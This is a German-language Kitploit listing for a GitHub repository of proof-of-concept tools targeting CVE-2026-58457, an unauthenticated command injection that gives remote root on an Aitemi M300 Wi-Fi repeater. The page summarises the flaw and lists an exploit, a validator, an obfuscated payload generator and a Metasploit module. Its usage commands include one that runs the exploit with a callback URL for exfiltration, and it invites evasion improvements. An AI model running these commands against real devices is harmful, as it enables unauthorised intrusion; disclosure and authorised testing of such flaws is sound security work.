Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and ControlLearning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-58457 - Nicht authentifizierte OS-Befehlsinjektion im Shenzhen Aitemi M300 Wi-Fi Repeater

[!WARNING] Dieser Code wird WIE BESEHEN nur für Bildungs- und Forschungszwecke bereitgestellt. Verwenden Sie diesen PoC nicht auf Produktionssystemen, gemeinsam genutzten Umgebungen oder nicht autorisierten Zielen.

  • Das Ausführen oder Hosten dieses Codes kann Antiviren-Erkennungen, Sicherheitsüberwachungswarnungen oder rechtliche Konsequenzen auslösen, wenn er missbraucht wird.
  • Die Autoren und Repository-Betreiber übernehmen keine Haftung für Schäden, Missbrauch oder illegale Aktivitäten, die aus diesem Code resultieren.
  • Verwenden Sie ihn ausschließlich in isolierten Laborumgebungen mit entsprechender Autorisierung. Nur für defensive Forschung, Schwachstellenanalyse und Blue-Team-Tests gedacht.

Schwachstellenzusammenfassung

Im Handler smacfilter_conf existiert eine nicht authentifizierte OS-Befehlsinjektionssicherheitslücke. Die GET-Parameter name, enable und mac werden ungesäubert in einen sprintf()-Aufruf übergeben, der UCI-Befehle konstruiert, die als root ausgeführt werden.

  • Schweregrad: Kritisch (CVSS 9.8)
  • Auswirkung: Remote-Root-Befehlsausführung ohne erforderliche Authentifizierung

Enthaltene Werkzeuge

  • poc.py - Voll ausgestatteter Exploit mit HTTPS-Unterstützung, Wiederholungsversuchen, Timeout und Callback-Exfiltration.
  • val.py - Sicherer, passiver Schwachstellenprüfer (verwendet harmlosen id-Befehl).
  • gen.py - Erweiterter Payload-Generator mit mehreren Verschleierungstechniken.
  • MITIGATIONS.md - Empfohlene Abwehrmaßnahmen.
  • Metasploit-Modul - Verfügbar im Verzeichnis exploit/.

Installation

root@kitploit:~
pip install requests

Schnelle Verwendung

  1. Überprüfen (Sicher)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Exploit (Nur autorisierte Tests)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Generieren von verschleierten Payloads
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Modul verschieben
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Alle neu laden
root@kitploit:~
msfconsole -q -x "reload_all"

Referenzen

  • CVE-2026-58457
  • VulnCheck-Bericht
  • GitHub-Offenlegung

Sterne und Beiträge willkommen - insbesondere Verbesserungen von Umgehungen oder zusätzliche Firmware-Varianten.

Tool herunterladen